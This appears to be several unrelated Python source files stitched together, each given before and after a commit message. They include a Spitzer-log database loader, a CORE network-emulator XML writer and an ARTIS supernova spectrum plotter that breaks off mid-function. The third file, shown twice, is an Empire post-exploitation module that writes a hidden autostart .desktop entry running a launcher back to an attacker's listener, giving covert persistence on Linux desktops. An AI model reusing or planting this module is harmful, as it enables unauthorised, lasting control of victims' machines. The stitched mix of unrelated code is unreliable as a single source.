field = file.split('_ipac')[0]
if 'x' in tab.colnames:
data['field_root'].append(field)
for k in bkey:
data['exp_'+k].append(0)
data['n_'+k].append(0)
data['fp_'+k].append([])
continue
N += len(tab)
print(i, file, N)
data['field_root'].append(field)
for k in bkey:
sel = tab['with_hst'] & (tab['wavelength'] == bkey[k])
data['exp_'+k].append(tab['exposuretime'][sel].sum()/3600)
data['n_'+k].append(sel.sum())
if sel.sum() == 0:
data['fp_'+k].append([])
continue
r, d = [], []
for j in range(4):
r.extend(tab['ra{0}'.format(j+1)][sel].data)
d.extend(tab['dec{0}'.format(j+1)][sel].data)
pts = np.array([r, d]).T
vert = ConvexHull(pts).vertices
fp = pts[vert, :]
data['fp_'+k].append(fp.T.tolist())
aors = np.unique(tab['reqkey'])
aor_data['field_root'].extend([field]*len(aors))
aor_data['reqkey'].extend(list(aors))
#
import pandas as pd
df = pd.DataFrame(aor_data)
df.to_sql('spitzer_aors', engine, index=False, if_exists='append', method='multi')
df = pd.DataFrame(data)
# First row to initialize table
first = df[0:1]
for k in bkey:
first.pop('fp_'+k)
engine.execute('drop table spitzer_log;')
first.to_sql('spitzer_log', engine, index=False, if_exists='append', method='multi')
for k in bkey:
cmd = 'alter table spitzer_log add column fp_{0} float [];'.format(k)
engine.execute(cmd)
engine.execute('delete from spitzer_log where True;')
df.to_sql('spitzer_log', engine, index=False, if_exists='append', method='multi')
def show_all_fields():
from grizli.aws import db as grizli_db
import matplotlib.pyplot as plt
plt.ioff()
res = pd.read_sql_query("select distinct root from redshift_fit order by root;", engine)
roots = res['root'].tolist()
for root in roots:
print('\n\n', root, '\n\n')
if os.path.exists('{0}_zhist.png'.format(root)):
continue
try:
res = grizli_db.make_html_table(engine=engine, columns=['mtime', 'root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 't_g800l', 't_g102', 't_g141', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'zwidth1/(1+z_map) as zw1', 'dlinesn', 'q_z'], where="AND status > 4 AND root = '{0}'".format(root), table_root=root, sync='s3://grizli-v1/Pipeline/{0}/Extractions/'.format(root), png_ext=['R30', 'stack', 'full', 'line'], show_hist=True)
except:
continue
os.system('aws s3 cp s3://grizli-v1/Pipeline/{0}/Extractions/{0}_zhist.png s3://grizli-v1/tables/'.format(root))
|
import socket
import subprocess
import os
import xmlutils
from core.netns import nodes
from core.misc import ipaddr
from core import constants
class CoreDeploymentWriter(object):
def __init__(self, dom, root, session):
self.dom = dom
self.root = root
self.session = session
self.hostname = socket.gethostname()
if self.session.emane.version < self.session.emane.EMANE092:
self.transport = None
self.platform = None
@staticmethod
def get_ipv4_addresses(hostname):
if hostname == 'localhost':
addr_list = []
cmd = (constants.IP_BIN, '-o', '-f', 'inet', 'addr', 'show')
output = subprocess.check_output(cmd)
for line in output.split(os.linesep):
split = line.split()
if not split:
continue
addr = split[3]
if not addr.startswith('127.'):
addr_list.append(addr)
return addr_list
else:
# TODO: handle other hosts
raise NotImplementedError
@staticmethod
def find_device(scenario, name):
tagName = ('device', 'host', 'router')
for d in xmlutils.iterDescendantsWithAttribute(scenario, tagName,
'name', name):
return d
return None
@staticmethod
def find_interface(device, name):
for i in xmlutils.iterDescendantsWithAttribute(device, 'interface',
'name', name):
return i
return None
def add_deployment(self):
testbed = self.dom.createElement('container')
testbed.setAttribute('name', 'TestBed')
testbed.setAttribute('id', 'TestBed')
self.root.baseEle.appendChild(testbed)
nodelist = []
for obj in self.session.objs():
if isinstance(obj, nodes.PyCoreNode):
nodelist.append(obj)
name = self.hostname
ipv4_addresses = self.get_ipv4_addresses('localhost')
testhost = self.add_physical_host(testbed, name, ipv4_addresses)
for n in nodelist:
self.add_virtual_host(testhost, n)
# TODO: handle other servers
# servers = self.session.broker.getserverlist()
# servers.remove('localhost')
def add_child_element(self, parent, tagName):
el = self.dom.createElement(tagName)
parent.appendChild(el)
return el
def add_child_element_with_nameattr(self, parent, tagName,
name, setid = True):
el = self.add_child_element(parent, tagName)
el.setAttribute('name', name)
if setid:
el.setAttribute('id', '%s/%s' % (parent.getAttribute('id'), name))
return el
def add_address(self, parent, address_type, address_str):
el = self.add_child_element(parent, 'address')
el.setAttribute('type', address_type)
el.appendChild(self.dom.createTextNode(address_str))
return el
def add_type(self, parent, type_str):
el = self.add_child_element(parent, 'type')
el.appendChild(self.dom.createTextNode(type_str))
return el
def add_platform(self, parent, name):
el = self.add_child_element_with_nameattr(parent,
'emanePlatform', name)
return el
def add_transport(self, parent, name):
el = self.add_child_element_with_nameattr(parent, 'transport', name)
return el
def add_nem(self, parent, name):
el = self.add_child_element_with_nameattr(parent, 'nem', name)
return el
def add_parameter(self, parent, name, val):
el = self.add_child_element_with_nameattr(parent, 'parameter',
name, False)
el.appendChild(self.dom.createTextNode(val))
return el
def add_mapping(self, parent, maptype, mapref):
el = self.add_child_element(parent, 'mapping')
el.setAttribute('type', maptype)
el.setAttribute('ref', mapref)
return el
def add_host(self, parent, name):
el = self.add_child_element_with_nameattr(parent, 'testHost', name)
return el
def add_physical_host(self, parent, name, ipv4_addresses):
el = self.add_host(parent, name)
self.add_type(el, 'physical')
for addr in ipv4_addresses:
self.add_address(el, 'IPv4', addr)
return el
def add_virtual_host(self, parent, obj):
assert isinstance(obj, nodes.PyCoreNode)
el = self.add_host(parent, obj.name)
device = self.find_device(self.root.baseEle, obj.name)
self.add_mapping(device, 'testHost', el.getAttribute('id'))
self.add_type(el, 'virtual')
for netif in obj.netifs():
for address in netif.addrlist:
addr, slash, prefixlen= address.partition('/')
if ipaddr.isIPv4Address(addr):
addr_type = 'IPv4'
elif ipaddr.isIPv6Address(addr):
addr_type = 'IPv6'
else:
raise NotImplementedError
self.add_address(el, addr_type, address)
if isinstance(netif.net, nodes.EmaneNode):
nem = self.add_emane_interface(parent, el, netif)
interface = self.find_interface(device, netif.name)
self.add_mapping(interface, 'nem', nem.getAttribute('id'))
return el
def add_emane_interface(self, physical_host, virtual_host, netif,
platform_name = 'p1', transport_name = 't1'):
nemid = netif.net.nemidmap[netif]
if self.session.emane.version < self.session.emane.EMANE092:
if self.platform is None:
self.platform = \
self.add_platform(physical_host, name = platform_name)
platform = self.platform
if self.transport is None:
self.transport = \
self.add_transport(physical_host, name = transport_name)
transport = self.transport
else:
platform = self.add_platform(virtual_host, name = platform_name)
transport = self.add_transport(virtual_host, name = transport_name)
nem_name = 'nem%s' % nemid
nem = self.add_nem(platform, nem_name)
self.add_parameter(nem, 'nemid', str(nemid))
self.add_mapping(transport, 'nem', nem.getAttribute('id'))
return nem
daemon: Check if devices are found when generating deployed scenario XML.
import socket
import subprocess
import os
import xmlutils
from core.netns import nodes
from core.misc import ipaddr
from core import constants
class CoreDeploymentWriter(object):
def __init__(self, dom, root, session):
self.dom = dom
self.root = root
self.session = session
self.hostname = socket.gethostname()
if self.session.emane.version < self.session.emane.EMANE092:
self.transport = None
self.platform = None
@staticmethod
def get_ipv4_addresses(hostname):
if hostname == 'localhost':
addr_list = []
cmd = (constants.IP_BIN, '-o', '-f', 'inet', 'addr', 'show')
output = subprocess.check_output(cmd)
for line in output.split(os.linesep):
split = line.split()
if not split:
continue
addr = split[3]
if not addr.startswith('127.'):
addr_list.append(addr)
return addr_list
else:
# TODO: handle other hosts
raise NotImplementedError
@staticmethod
def find_device(scenario, name):
tagName = ('device', 'host', 'router')
for d in xmlutils.iterDescendantsWithAttribute(scenario, tagName,
'name', name):
return d
return None
@staticmethod
def find_interface(device, name):
for i in xmlutils.iterDescendantsWithAttribute(device, 'interface',
'name', name):
return i
return None
def add_deployment(self):
testbed = self.dom.createElement('container')
testbed.setAttribute('name', 'TestBed')
testbed.setAttribute('id', 'TestBed')
self.root.baseEle.appendChild(testbed)
nodelist = []
for obj in self.session.objs():
if isinstance(obj, nodes.PyCoreNode):
nodelist.append(obj)
name = self.hostname
ipv4_addresses = self.get_ipv4_addresses('localhost')
testhost = self.add_physical_host(testbed, name, ipv4_addresses)
for n in nodelist:
self.add_virtual_host(testhost, n)
# TODO: handle other servers
# servers = self.session.broker.getserverlist()
# servers.remove('localhost')
def add_child_element(self, parent, tagName):
el = self.dom.createElement(tagName)
parent.appendChild(el)
return el
def add_child_element_with_nameattr(self, parent, tagName,
name, setid = True):
el = self.add_child_element(parent, tagName)
el.setAttribute('name', name)
if setid:
el.setAttribute('id', '%s/%s' % (parent.getAttribute('id'), name))
return el
def add_address(self, parent, address_type, address_str):
el = self.add_child_element(parent, 'address')
el.setAttribute('type', address_type)
el.appendChild(self.dom.createTextNode(address_str))
return el
def add_type(self, parent, type_str):
el = self.add_child_element(parent, 'type')
el.appendChild(self.dom.createTextNode(type_str))
return el
def add_platform(self, parent, name):
el = self.add_child_element_with_nameattr(parent,
'emanePlatform', name)
return el
def add_transport(self, parent, name):
el = self.add_child_element_with_nameattr(parent, 'transport', name)
return el
def add_nem(self, parent, name):
el = self.add_child_element_with_nameattr(parent, 'nem', name)
return el
def add_parameter(self, parent, name, val):
el = self.add_child_element_with_nameattr(parent, 'parameter',
name, False)
el.appendChild(self.dom.createTextNode(val))
return el
def add_mapping(self, parent, maptype, mapref):
el = self.add_child_element(parent, 'mapping')
el.setAttribute('type', maptype)
el.setAttribute('ref', mapref)
return el
def add_host(self, parent, name):
el = self.add_child_element_with_nameattr(parent, 'testHost', name)
return el
def add_physical_host(self, parent, name, ipv4_addresses):
el = self.add_host(parent, name)
self.add_type(el, 'physical')
for addr in ipv4_addresses:
self.add_address(el, 'IPv4', addr)
return el
def add_virtual_host(self, parent, obj):
assert isinstance(obj, nodes.PyCoreNode)
el = self.add_host(parent, obj.name)
device = self.find_device(self.root.baseEle, obj.name)
if device is None:
self.session.warn('corresponding XML device not found for %s' %
(obj.name))
return
self.add_mapping(device, 'testHost', el.getAttribute('id'))
self.add_type(el, 'virtual')
for netif in obj.netifs():
for address in netif.addrlist:
addr, slash, prefixlen= address.partition('/')
if ipaddr.isIPv4Address(addr):
addr_type = 'IPv4'
elif ipaddr.isIPv6Address(addr):
addr_type = 'IPv6'
else:
raise NotImplementedError
self.add_address(el, addr_type, address)
if isinstance(netif.net, nodes.EmaneNode):
nem = self.add_emane_interface(parent, el, netif)
interface = self.find_interface(device, netif.name)
self.add_mapping(interface, 'nem', nem.getAttribute('id'))
return el
def add_emane_interface(self, physical_host, virtual_host, netif,
platform_name = 'p1', transport_name = 't1'):
nemid = netif.net.nemidmap[netif]
if self.session.emane.version < self.session.emane.EMANE092:
if self.platform is None:
self.platform = \
self.add_platform(physical_host, name = platform_name)
platform = self.platform
if self.transport is None:
self.transport = \
self.add_transport(physical_host, name = transport_name)
transport = self.transport
else:
platform = self.add_platform(virtual_host, name = platform_name)
transport = self.add_transport(virtual_host, name = transport_name)
nem_name = 'nem%s' % nemid
nem = self.add_nem(platform, nem_name)
self.add_parameter(nem, 'nemid', str(nemid))
self.add_mapping(transport, 'nem', nem.getAttribute('id'))
return nem
|
import base64
class Module:
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'DesktopFile',
# list of one or more authors for the module
'Author': ['@jarrodcoulter'],
# more verbose multi-line description of the module
'Description': ('Installs an Empire launcher script in ~/.config/autostart on Linux versions with GUI.'),
# True if the module needs to run in the background
'Background' : False,
# File extension to save the file as
'OutputExtension' : None,
# if the module needs administrative privileges
'NeedsAdmin' : False,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe' : False,
# the module language
'Language' : 'python',
# the minimum language version needed
'MinLanguageVersion' : '2.6',
# list of any references/other comments
'Comments': [https://digitasecurity.com/blog/2018/01/23/crossrat/
https://specifications.freedesktop.org/desktop-entry-spec/latest/ar01s07.html,
https://neverbenever.wordpress.com/2015/02/11/how-to-autostart-a-program-in-raspberry-pi-or-linux/]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to execute module on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : True,
'Value' : ''
},
'Remove' : {
'Description' : 'Remove Persistence based on FileName. True/False',
'Required' : False,
'Value' : ''
},
'FileName' : {
'Description' : 'File name without extension that you would like created in ~/.config/autostart/ folder.',
'Required' : False,
'Value' : 'sec_start'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
remove = self.options['Remove']['Value']
fileName = self.options['FileName']['Value']
listenerName = self.options['Listener']['Value']
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='python')
launcher = launcher.strip('echo').strip(' | /usr/bin/python &')
dtSettings = """
[Desktop Entry]
Name=%s
Exec=python -c %s
Type=Application
NoDisplay=True
""" % (fileName, launcher)
script = """
import subprocess
import sys
import os
remove = "%s"
dtFile = \"\"\"
%s
\"\"\"
home = os.path.expanduser("~")
filePath = home + "/.config/autostart/"
writeFile = filePath + "%s.desktop"
if remove.lower() == "true":
if os.path.isfile(writeFile):
os.remove(writeFile)
print "\\n[+] Persistence has been removed"
else:
print "\\n[-] Persistence file does not exist, nothing removed"
else:
if not os.path.exists(filePath):
os.makedirs(filePath)
e = open(writeFile,'wb')
e.write(dtFile)
e.close()
print "\\n[+] Persistence has been installed: ~/.config/autostart/%s"
print "\\n[+] Empire daemon has been written to %s"
""" % (remove, dtSettings, fileName, fileName, fileName)
return script
Update comments
import base64
class Module:
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'DesktopFile',
# list of one or more authors for the module
'Author': '@jarrodcoulter',
# more verbose multi-line description of the module
'Description': 'Installs an Empire launcher script in ~/.config/autostart on Linux versions with GUI.',
# True if the module needs to run in the background
'Background' : False,
# File extension to save the file as
'OutputExtension' : None,
# if the module needs administrative privileges
'NeedsAdmin' : False,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe' : False,
# the module language
'Language' : 'python',
# the minimum language version needed
'MinLanguageVersion' : '2.6',
# list of any references/other comments
'Comments': 'https://digitasecurity.com/blog/2018/01/23/crossrat/, https://specifications.freedesktop.org/desktop-entry-spec/latest/ar01s07.html, https://neverbenever.wordpress.com/2015/02/11/how-to-autostart-a-program-in-raspberry-pi-or-linux/'
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to execute module on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : True,
'Value' : ''
},
'Remove' : {
'Description' : 'Remove Persistence based on FileName. True/False',
'Required' : False,
'Value' : ''
},
'FileName' : {
'Description' : 'File name without extension that you would like created in ~/.config/autostart/ folder.',
'Required' : False,
'Value' : 'sec_start'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
remove = self.options['Remove']['Value']
fileName = self.options['FileName']['Value']
listenerName = self.options['Listener']['Value']
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='python')
launcher = launcher.strip('echo').strip(' | /usr/bin/python &')
dtSettings = """
[Desktop Entry]
Name=%s
Exec=python -c %s
Type=Application
NoDisplay=True
""" % (fileName, launcher)
script = """
import subprocess
import sys
import os
remove = "%s"
dtFile = \"\"\"
%s
\"\"\"
home = os.path.expanduser("~")
filePath = home + "/.config/autostart/"
writeFile = filePath + "%s.desktop"
if remove.lower() == "true":
if os.path.isfile(writeFile):
os.remove(writeFile)
print "\\n[+] Persistence has been removed"
else:
print "\\n[-] Persistence file does not exist, nothing removed"
else:
if not os.path.exists(filePath):
os.makedirs(filePath)
e = open(writeFile,'wb')
e.write(dtFile)
e.close()
print "\\n[+] Persistence has been installed: ~/.config/autostart/%s"
print "\\n[+] Empire daemon has been written to %s"
""" % (remove, dtSettings, fileName, fileName, fileName)
return script
|
#!/usr/bin/env python3
import argparse
import glob
import itertools
import os.path
import sys
import warnings
import artistools as at
import matplotlib.patches as mpatches
import matplotlib.pyplot as plt
import pandas as pd
# import matplotlib.ticker as ticker
warnings.filterwarnings(action="ignore", module="scipy", message="^internal gelsd")
def main(argsraw=None):
"""
Plot ARTIS spectra and (optionally) reference spectra
"""
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description='Plot ARTIS model spectra by finding spec.out files '
'in the current directory or subdirectories.')
parser.add_argument('modelpath', default=[], nargs='*',
help='Paths to ARTIS folders with spec.out or packets files'
' (may include wildcards such as * and **)')
parser.add_argument('--frompackets', default=False, action='store_true',
help='Read packets files directly instead of exspec results')
parser.add_argument('--emissionabsorption', default=False, action='store_true',
help='Show an emission/absorption plot')
parser.add_argument('-maxseriescount', type=int, default=9,
help='Maximum number of plot series (ions/processes) for emission/absorption plot')
parser.add_argument('-listtimesteps', action='store_true', default=False,
help='Show the times at each timestep')
parser.add_argument('-timestep', nargs='?',
help='First timestep or a range e.g. 45-65')
parser.add_argument('-timemin', type=float,
help='Lower time in days to integrate spectrum')
parser.add_argument('-timemax', type=float,
help='Upper time in days to integrate spectrum')
parser.add_argument('-xmin', type=int, default=2500,
help='Plot range: minimum wavelength in Angstroms')
parser.add_argument('-xmax', type=int, default=11000,
help='Plot range: maximum wavelength in Angstroms')
parser.add_argument('--normalised', default=False, action='store_true',
help='Normalise the spectra to their peak values')
parser.add_argument('-obsspec', action='append', dest='refspecfiles',
help='Also plot reference spectrum from this file')
parser.add_argument('-legendfontsize', type=int, default=8,
help='Font size of legend text')
parser.add_argument('-o', action='store', dest='outputfile',
help='path/filename for PDF file')
args = parser.parse_args(argsraw)
if len(args.modelpath) == 0:
args.modelpath = ['.', '*']
# combined the results of applying wildcards on each input
modelpaths = list(itertools.chain.from_iterable([glob.glob(x) for x in args.modelpath if os.path.isdir(x)]))
if args.listtimesteps:
at.showtimesteptimes(modelpaths[0])
else:
if args.emissionabsorption:
if len(modelpaths) > 1:
print("ERROR: emission/absorption plot can only take one input model")
sys.exit()
defaultoutputfile = "plotspecemission.pdf"
else:
defaultoutputfile = "plotspec.pdf"
if not args.outputfile:
args.outputfile = defaultoutputfile
elif os.path.isdir(args.outputfile):
args.outputfile = os.path.join(args.outputfile, defaultoutputfile)
make_plot(modelpaths, args)
def plot_reference_spectra(axis, plotobjects, plotobjectlabels, args, flambdafilterfunc=None, scale_to_peak=None,
**plotkwargs):
"""
Plot reference spectra listed in args.refspecfiles
"""
if args.refspecfiles is not None:
colorlist = ['black', '0.4']
for index, filename in enumerate(args.refspecfiles):
serieslabel = at.spectra.refspectralabels.get(filename, filename)
if index < len(colorlist):
plotkwargs['color'] = colorlist[index]
plotobjects.append(
plot_reference_spectrum(
filename, serieslabel, axis, args.xmin, args.xmax, args.normalised,
flambdafilterfunc, scale_to_peak, **plotkwargs))
plotobjectlabels.append(serieslabel)
def plot_reference_spectrum(filename, serieslabel, axis, xmin, xmax, normalised,
flambdafilterfunc=None, scale_to_peak=None, **plotkwargs):
scriptdir = os.path.dirname(os.path.abspath(__file__))
filepath = os.path.join(scriptdir, 'refspectra', filename)
specdata = pd.read_csv(filepath, delim_whitespace=True, header=None,
names=['lambda_angstroms', 'f_lambda'], usecols=[0, 1])
print(f"Reference spectrum '{serieslabel}' has {len(specdata)} points in the plot range")
specdata.query('lambda_angstroms > @xmin and lambda_angstroms < @xmax', inplace=True)
print_integrated_flux(specdata.f_lambda, specdata.lambda_angstroms)
if len(specdata) > 5000:
# specdata = scipy.signal.resample(specdata, 10000)
# specdata = specdata.iloc[::3, :].copy()
specdata.query('index % 3 == 0', inplace=True)
print(f" downsamping to {len(specdata)} points")
# clamp negative values to zero
specdata['f_lambda'] = specdata['f_lambda'].apply(lambda x: max(0, x))
if flambdafilterfunc:
specdata['f_lambda'] = flambdafilterfunc(specdata['f_lambda'])
if normalised:
specdata['f_lambda_scaled'] = (specdata['f_lambda'] / specdata['f_lambda'].max() *
(scale_to_peak if scale_to_peak else 1.0))
ycolumnname = 'f_lambda_scaled'
else:
ycolumnname = 'f_lambda'
if 'linewidth' not in plotkwargs and 'lw' not in plotkwargs:
plotkwargs['linewidth'] = 1.5
lineplot = specdata.plot(x='lambda_angstroms', y=ycolumnname, ax=axis, label=serieslabel, zorder=-1, **plotkwargs)
return mpatches.Patch(color=lineplot.get_lines()[0].get_color())
def plot_artis_spectrum(axis, modelpath, args, from_packets=False, filterfunc=None, **plotkwargs):
specfilename = os.path.join(modelpath, 'spec.out')
(modelname, timestepmin, timestepmax,
time_days_lower, time_days_upper) = at.get_model_name_times(
specfilename, at.get_timestep_times(specfilename),
args.timestep, args.timemin, args.timemax)
linelabel = f'{modelname} at t={time_days_lower:.2f}d to {time_days_upper:.2f}d'
if from_packets:
# find any other packets files in the same directory
packetsfiles_thismodel = glob.glob(os.path.join(modelpath, 'packets**.out'))
print(packetsfiles_thismodel)
spectrum = at.spectra.get_spectrum_from_packets(
packetsfiles_thismodel, time_days_lower, time_days_upper, lambda_min=args.xmin, lambda_max=args.xmax)
else:
spectrum = at.spectra.get_spectrum(specfilename, timestepmin, timestepmax, fnufilterfunc=filterfunc)
spectrum.query('@args.xmin < lambda_angstroms and lambda_angstroms < @args.xmax', inplace=True)
at.spectra.print_integrated_flux(spectrum['f_lambda'], spectrum['lambda_angstroms'])
spectrum['f_lambda_scaled'] = spectrum['f_lambda'] / spectrum['f_lambda'].max()
ycolumnname = 'f_lambda_scaled' if args.normalised else 'f_lambda'
spectrum.plot(x='lambda_angstroms', y=ycolumnname, ax=axis,
label=linelabel, alpha=0.95, **plotkwargs)
def make_spectrum_plot(modelpaths, axis, filterfunc, args):
"""
Set up a matplotlib figure and plot observational and ARTIS spectra
"""
plot_reference_spectra(axis, [], [], args, flambdafilterfunc=filterfunc)
for index, modelpath in enumerate(modelpaths):
modelname = at.get_model_name(modelpath)
print(f"====> {modelname}")
plotkwargs = {}
# plotkwargs['dashes'] = dashesList[index]
# plotkwargs['dash_capstyle'] = dash_capstyleList[index]
plotkwargs['linestyle'] = '--' if (int(index / 7) % 2) else '-'
plotkwargs['linewidth'] = 2.5 - (0.2 * index)
plot_artis_spectrum(axis, modelpath, args=args, from_packets=args.frompackets,
filterfunc=filterfunc, **plotkwargs)
if args.normalised:
axis.set_ylim(ymin=-0.1, ymax=1.25)
axis.set_ylabel(r'Scaled F$_\lambda$')
def make_emission_plot(modelpath, axis, filterfunc, args):
from astropy import constants as const
maxion = 5 # must match sn3d.h value
emissionfilename = os.path.join(modelpath, 'emissiontrue.out')
if not os.path.exists(emissionfilename):
emissionfilename = os.path.join(modelpath, 'emission.out')
specfilename = os.path.join(modelpath, 'spec.out')
specdata = pd.read_csv(specfilename, delim_whitespace=True)
timearray = specdata.columns.values[1:]
arraynu = specdata.loc[:, '0'].values
arraylambda_angstroms = const.c.to('angstrom/s').value / arraynu
(modelname, timestepmin, timestepmax,
time_days_lower, time_days_upper) = at.get_model_name_times(
specfilename, timearray, args.timestep, args.timemin, args.timemax)
absorptionfilename = os.path.join(modelpath, 'absorption.out')
contribution_list, maxyvalueglobal, array_flambda_emission_total = at.spectra.get_flux_contributions(
emissionfilename, absorptionfilename, maxion, timearray, arraynu,
filterfunc, args.xmin, args.xmax, timestepmin, timestepmax)
at.spectra.print_integrated_flux(array_flambda_emission_total, arraylambda_angstroms)
# print("\n".join([f"{x[0]}, {x[1]}" for x in contribution_list]))
contributions_sorted_reduced = at.spectra.sort_and_reduce_flux_contribution_list(
contribution_list, args.maxseriescount, arraylambda_angstroms)
plotobjects = axis.stackplot(
arraylambda_angstroms, [x.array_flambda_emission for x in contributions_sorted_reduced], linewidth=0)
facecolors = [p.get_facecolor()[0] for p in plotobjects]
axis.stackplot(
arraylambda_angstroms, [-x.array_flambda_absorption for x in contributions_sorted_reduced],
colors=facecolors, linewidth=0)
plotobjectlabels = list([x.linelabel for x in contributions_sorted_reduced])
plot_reference_spectra(axis, plotobjects, plotobjectlabels, args, flambdafilterfunc=None,
scale_to_peak=(maxyvalueglobal if args.normalised else None), linewidth=0.5)
axis.axhline(color='white', linewidth=0.5)
plotlabel = f't={time_days_lower:.2f}d to {time_days_upper:.2f}d\n{modelname}'
axis.annotate(plotlabel, xy=(0.97, 0.03), xycoords='axes fraction',
horizontalalignment='right', verticalalignment='bottom', fontsize=9)
# axis.set_ylim(ymin=-0.05 * maxyvalueglobal, ymax=maxyvalueglobal * 1.3)
return plotobjects, plotobjectlabels
def make_plot(modelpaths, args):
import matplotlib.ticker as ticker
fig, axis = plt.subplots(1, 1, sharey=True, figsize=(8, 5), tight_layout={"pad": 0.2, "w_pad": 0.0, "h_pad": 0.0})
axis.set_ylabel(r'F$_\lambda$ at 1 Mpc [erg/s/cm$^2$/$\AA$]')
import scipy.signal
def filterfunc(flambda):
return scipy.signal.savgol_filter(flambda, 5, 3)
# filterfunc = None
if args.emissionabsorption:
plotobjects, plotobjectlabels = make_emission_plot(modelpaths[0], axis, filterfunc, args)
else:
make_spectrum_plot(modelpaths, axis, filterfunc, args)
plotobjects, plotobjectlabels = axis.get_legend_handles_labels()
axis.legend(plotobjects, plotobjectlabels, loc='best', handlelength=2,
frameon=False, numpoints=1, prop={'size': args.legendfontsize})
# plt.setp(plt.getp(axis, 'xticklabels'), fontsize=fsticklabel)
# plt.setp(plt.getp(axis, 'yticklabels'), fontsize=fsticklabel)
# for axis in ['top', 'bottom', 'left', 'right']:
# axis.spines[axis].set_linewidth(framewidth)
axis.set_xlabel(r'Wavelength ($\AA$)')
axis.set_xlim(xmin=args.xmin, xmax=args.xmax)
axis.xaxis.set_major_locator(ticker.MultipleLocator(base=1000))
axis.xaxis.set_minor_locator(ticker.MultipleLocator(base=100))
filenameout = args.outputfile
fig.savefig(filenameout, format='pdf')
# plt.show()
print(f'Saved {filenameout}')
plt.close()
if __name__ == "__main__":
main()
Don't use len() on sequence
#!/usr/bin/env python3
import argparse
import glob
import itertools
import os.path
import sys
import warnings
import artistools as at
import matplotlib.patches as mpatches
import matplotlib.pyplot as plt
import pandas as pd
# import matplotlib.ticker as ticker
warnings.filterwarnings(action="ignore", module="scipy", message="^internal gelsd")
def main(argsraw=None):
"""
Plot ARTIS spectra and (optionally) reference spectra
"""
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description='Plot ARTIS model spectra by finding spec.out files '
'in the current directory or subdirectories.')
parser.add_argument('modelpath', default=[], nargs='*',
help='Paths to ARTIS folders with spec.out or packets files'
' (may include wildcards such as * and **)')
parser.add_argument('--frompackets', default=False, action='store_true',
help='Read packets files directly instead of exspec results')
parser.add_argument('--emissionabsorption', default=False, action='store_true',
help='Show an emission/absorption plot')
parser.add_argument('-maxseriescount', type=int, default=9,
help='Maximum number of plot series (ions/processes) for emission/absorption plot')
parser.add_argument('-listtimesteps', action='store_true', default=False,
help='Show the times at each timestep')
parser.add_argument('-timestep', nargs='?',
help='First timestep or a range e.g. 45-65')
parser.add_argument('-timemin', type=float,
help='Lower time in days to integrate spectrum')
parser.add_argument('-timemax', type=float,
help='Upper time in days to integrate spectrum')
parser.add_argument('-xmin', type=int, default=2500,
help='Plot range: minimum wavelength in Angstroms')
parser.add_argument('-xmax', type=int, default=11000,
help='Plot range: maximum wavelength in Angstroms')
parser.add_argument('--normalised', default=False, action='store_true',
help='Normalise the spectra to their peak values')
parser.add_argument('-obsspec', action='append', dest='refspecfiles',
help='Also plot reference spectrum from this file')
parser.add_argument('-legendfontsize', type=int, default=8,
help='Font size of legend text')
parser.add_argument('-o', action='store', dest='outputfile',
help='path/filename for PDF file')
args = parser.parse_args(argsraw)
if not args.modelpath:
args.modelpath = ['.', '*']
# combined the results of applying wildcards on each input
modelpaths = list(itertools.chain.from_iterable([glob.glob(x) for x in args.modelpath if os.path.isdir(x)]))
if args.listtimesteps:
at.showtimesteptimes(modelpaths[0])
else:
if args.emissionabsorption:
if len(modelpaths) > 1:
print("ERROR: emission/absorption plot can only take one input model")
sys.exit()
defaultoutputfile = "plotspecemission.pdf"
else:
defaultoutputfile = "plotspec.pdf"
if not args.outputfile:
args.outputfile = defaultoutputfile
elif os.path.isdir(args.outputfile):
args.outputfile = os.path.join(args.outputfile, defaultoutputfile)
make_plot(modelpaths, args)
def plot_reference_spectra(axis, plotobjects, plotobjectlabels, args, flambdafilterfunc=None, scale_to_peak=None,
**plotkwargs):
"""
Plot reference spectra listed in args.refspecfiles
"""
if args.refspecfiles is not None:
colorlist = ['black', '0.4']
for index, filename in enumerate(args.refspecfiles):
serieslabel = at.spectra.refspectralabels.get(filename, filename)
if index < len(colorlist):
plotkwargs['color'] = colorlist[index]
plotobjects.append(
plot_reference_spectrum(
filename, serieslabel, axis, args.xmin, args.xmax, args.normalised,
flambdafilterfunc, scale_to_peak, **plotkwargs))
plotobjectlabels.append(serieslabel)
def plot_reference_spectrum(filename, serieslabel, axis, xmin, xmax, normalised,
flambdafilterfunc=None, scale_to_peak=None, **plotkwargs):
scriptdir = os.path.dirname(os.path.abspath(__file__))
filepath = os.path.join(scriptdir, 'refspectra', filename)
specdata = pd.read_csv(filepath, delim_whitespace=True, header=None,
